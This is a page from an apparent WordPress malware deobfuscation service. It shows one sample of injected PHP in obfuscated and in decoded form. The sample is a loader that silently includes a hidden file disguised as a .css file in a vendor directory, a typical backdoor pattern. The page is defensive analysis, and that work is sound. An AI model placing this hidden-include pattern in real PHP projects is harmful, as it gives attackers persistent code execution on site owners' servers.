Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php /*af0a4*/ $rue5p = "/hom\x65/v\x65xability/www/d\x65li_cms_r\x65l/z\x65ro15/v\x65ndor/.2df5276d.css"; if (isset($rue5p)){ @include_once /* 74se8 */ ($rue5p); } /*af0a4*/...



Obfuscated php code

<?php /*af0a4*/

$rue5p = "/hom\x65/v\x65xability/www/d\x65li_cms_r\x65l/z\x65ro15/v\x65ndor/.2df5276d.css"; if (isset($rue5p)){ @include_once /* 74se8 */ ($rue5p); }

/*af0a4*/

Decoded(de-Obfuscated) php code

<?php

/*af0a4*/
$rue5p = "/home/vexability/www/deli_cms_rel/zero15/vendor/.2df5276d.css";
if (isset($rue5p)) {
    @(include_once $rue5p);
}
/*af0a4*/


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.